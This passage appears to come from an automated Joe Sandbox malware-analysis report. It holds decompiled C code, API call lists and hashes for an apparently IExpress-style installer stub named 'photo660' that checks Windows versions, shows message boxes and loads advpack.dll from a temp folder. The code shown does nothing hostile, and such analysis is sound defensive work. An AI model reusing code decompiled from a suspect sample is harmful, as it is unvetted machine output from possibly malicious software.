                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("photo660");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E00A9681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "photo660", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E00A967C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E00A928E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0xa99a40 = _t119;
                                                                                                                                                                                                        						 *0xa98184 = 1;
                                                                                                                                                                                                        						 *0xa98180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0xa99a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xa98184 = _t135;
                                                                                                                                                                                                        							 *0xa98180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t138 = 0x4ca;
                                                                                                                                                                                                        					goto L44;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = 0x4b4;
                                                                                                                                                                                                        					L44:
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					_push(_t135);
                                                                                                                                                                                                        					L65:
                                                                                                                                                                                                        					_t133 = _t138;
                                                                                                                                                                                                        					E00A944B9(0, _t138);
                                                                                                                                                                                                        					L66:
                                                                                                                                                                                                        					return E00A96CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00a93975
                                                                                                                                                                                                        0x00a938c7
                                                                                                                                                                                                        0x00a938de
                                                                                                                                                                                                        0x00a938e0
                                                                                                                                                                                                        0x00a938e0
                                                                                                                                                                                                        0x00a9397b
                                                                                                                                                                                                        0x00a9397d
                                                                                                                                                                                                        0x00a939a9
                                                                                                                                                                                                        0x00a9397f
                                                                                                                                                                                                        0x00a93982
                                                                                                                                                                                                        0x00a9398b
                                                                                                                                                                                                        0x00a9398d
                                                                                                                                                                                                        0x00a9398f
                                                                                                                                                                                                        0x00a9399f
                                                                                                                                                                                                        0x00a939a1
                                                                                                                                                                                                        0x00a93991
                                                                                                                                                                                                        0x00a93991
                                                                                                                                                                                                        0x00a93991
                                                                                                                                                                                                        0x00a9398f
                                                                                                                                                                                                        0x00a939af
                                                                                                                                                                                                        0x00a939b6
                                                                                                                                                                                                        0x00a93a0f
                                                                                                                                                                                                        0x00a93a0f
                                                                                                                                                                                                        0x00a93a11
                                                                                                                                                                                                        0x00a93a13
                                                                                                                                                                                                        0x00a93a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939b8
                                                                                                                                                                                                        0x00a939b8
                                                                                                                                                                                                        0x00a939ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939bc
                                                                                                                                                                                                        0x00a939bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939c3
                                                                                                                                                                                                        0x00a939c9
                                                                                                                                                                                                        0x00a939ce
                                                                                                                                                                                                        0x00a939d0
                                                                                                                                                                                                        0x00a939e3
                                                                                                                                                                                                        0x00a939e5
                                                                                                                                                                                                        0x00a939e6
                                                                                                                                                                                                        0x00a939f1
                                                                                                                                                                                                        0x00a939f7
                                                                                                                                                                                                        0x00a939fa
                                                                                                                                                                                                        0x00a93a01
                                                                                                                                                                                                        0x00a93a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93a06
                                                                                                                                                                                                        0x00a93a09
                                                                                                                                                                                                        0x00a93a09
                                                                                                                                                                                                        0x00a93a0b
                                                                                                                                                                                                        0x00a93a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93a09
                                                                                                                                                                                                        0x00a939fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939fc
                                                                                                                                                                                                        0x00a939d3
                                                                                                                                                                                                        0x00a939d8
                                                                                                                                                                                                        0x00a939da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a939dc
                                                                                                                                                                                                        0x00a939b6
                                                                                                                                                                                                        0x00a93955
                                                                                                                                                                                                        0x00a9395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93961
                                                                                                                                                                                                        0x00a93963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93969
                                                                                                                                                                                                        0x00a93969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93969
                                                                                                                                                                                                        0x00a93915
                                                                                                                                                                                                        0x00a93915
                                                                                                                                                                                                        0x00a9391b
                                                                                                                                                                                                        0x00a9391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9392d
                                                                                                                                                                                                        0x00a93933
                                                                                                                                                                                                        0x00a93938
                                                                                                                                                                                                        0x00a9393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93940
                                                                                                                                                                                                        0x00a93946
                                                                                                                                                                                                        0x00a9394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a938f2
                                                                                                                                                                                                        0x00a93843
                                                                                                                                                                                                        0x00a93845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9384b
                                                                                                                                                                                                        0x00a9384d
                                                                                                                                                                                                        0x00a93883
                                                                                                                                                                                                        0x00a93885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9389a
                                                                                                                                                                                                        0x00a9389e
                                                                                                                                                                                                        0x00a9389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a938a0
                                                                                                                                                                                                        0x00a938a0
                                                                                                                                                                                                        0x00a938a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a938a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a938a4
                                                                                                                                                                                                        0x00a9384f
                                                                                                                                                                                                        0x00a93851
                                                                                                                                                                                                        0x00a93857
                                                                                                                                                                                                        0x00a9386e
                                                                                                                                                                                                        0x00a93877
                                                                                                                                                                                                        0x00a9387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93881

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A93723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00A939C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,photo660,00000030), ref: 00A939F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$photo660
                                                                                                                                                                                                        • API String ID: 2519184315-2999727582
                                                                                                                                                                                                        • Opcode ID: e370418f6fbe93d458e4d1f8624cc1e0fe5a2f71c2ebcaccb859178b6918ec52
                                                                                                                                                                                                        • Instruction ID: 72ca25b0093826b213ea6c2f3dc6cd66d07a72061314878bf46ebda0ed51e08b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e370418f6fbe93d458e4d1f8624cc1e0fe5a2f71c2ebcaccb859178b6918ec52
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2391F172B012249FEF34CB69CD90BAAB3F1EB45344F1541AAD88ADB251DB718F81CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00A96495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E00A91781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E00A9658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A964DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A964F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A96502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-258089097
                                                                                                                                                                                                        • Opcode ID: da82aaaca295d776634be7919b061313847335cd09f9da07cf4eeba76de650d7
                                                                                                                                                                                                        • Instruction ID: 633a4e4d03d8a2d48ab65d7f1b6a912a0697b6a0294d7cc0377eb5a6513f298e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: da82aaaca295d776634be7919b061313847335cd09f9da07cf4eeba76de650d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC01A470B04108ABDF50EBA4DC49EEE77B8EF65311F50029AF589961D0DF709E8ACA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E00A92773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A92A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A92A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92955
                                                                                                                                                                                                        0x00a9295e
                                                                                                                                                                                                        0x00a92962
                                                                                                                                                                                                        0x00a92969
                                                                                                                                                                                                        0x00a9296f
                                                                                                                                                                                                        0x00a92974
                                                                                                                                                                                                        0x00a9298c
                                                                                                                                                                                                        0x00a92a20
                                                                                                                                                                                                        0x00a92a21
                                                                                                                                                                                                        0x00a92a27
                                                                                                                                                                                                        0x00a92a4c
                                                                                                                                                                                                        0x00a92a4f
                                                                                                                                                                                                        0x00a92a50
                                                                                                                                                                                                        0x00a92a53
                                                                                                                                                                                                        0x00a92a56
                                                                                                                                                                                                        0x00a92a5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a929b2
                                                                                                                                                                                                        0x00a929b2
                                                                                                                                                                                                        0x00a929b5
                                                                                                                                                                                                        0x00a929bd
                                                                                                                                                                                                        0x00a929c3
                                                                                                                                                                                                        0x00a929cc
                                                                                                                                                                                                        0x00a929d5
                                                                                                                                                                                                        0x00a929d7
                                                                                                                                                                                                        0x00a929da
                                                                                                                                                                                                        0x00a929dd
                                                                                                                                                                                                        0x00a929df
                                                                                                                                                                                                        0x00a929ec
                                                                                                                                                                                                        0x00a929f8
                                                                                                                                                                                                        0x00a929fc
                                                                                                                                                                                                        0x00a929ff
                                                                                                                                                                                                        0x00a92a02
                                                                                                                                                                                                        0x00a92a07
                                                                                                                                                                                                        0x00a92a0a
                                                                                                                                                                                                        0x00a92a0f
                                                                                                                                                                                                        0x00a92a19
                                                                                                                                                                                                        0x00a92a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92a0f
                                                                                                                                                                                                        0x00a9298c
                                                                                                                                                                                                        0x00a92974
                                                                                                                                                                                                        0x00a92962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9294f
                                                                                                                                                                                                        0x00a92912
                                                                                                                                                                                                        0x00a92a65
                                                                                                                                                                                                        0x00a92a68
                                                                                                                                                                                                        0x00a92a6c
                                                                                                                                                                                                        0x00a92a6f
                                                                                                                                                                                                        0x00a92a6f
                                                                                                                                                                                                        0x00a92a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00A92A6F
                                                                                                                                                                                                          • Part of subcall function 00A92773: CharUpperA.USER32(6298F871,00000000,00000000,00000000), ref: 00A927A8
                                                                                                                                                                                                          • Part of subcall function 00A92773: CharNextA.USER32(0000054D), ref: 00A927B5
                                                                                                                                                                                                          • Part of subcall function 00A92773: CharNextA.USER32(00000000), ref: 00A927BC
                                                                                                                                                                                                          • Part of subcall function 00A92773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92829
                                                                                                                                                                                                          • Part of subcall function 00A92773: RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92852
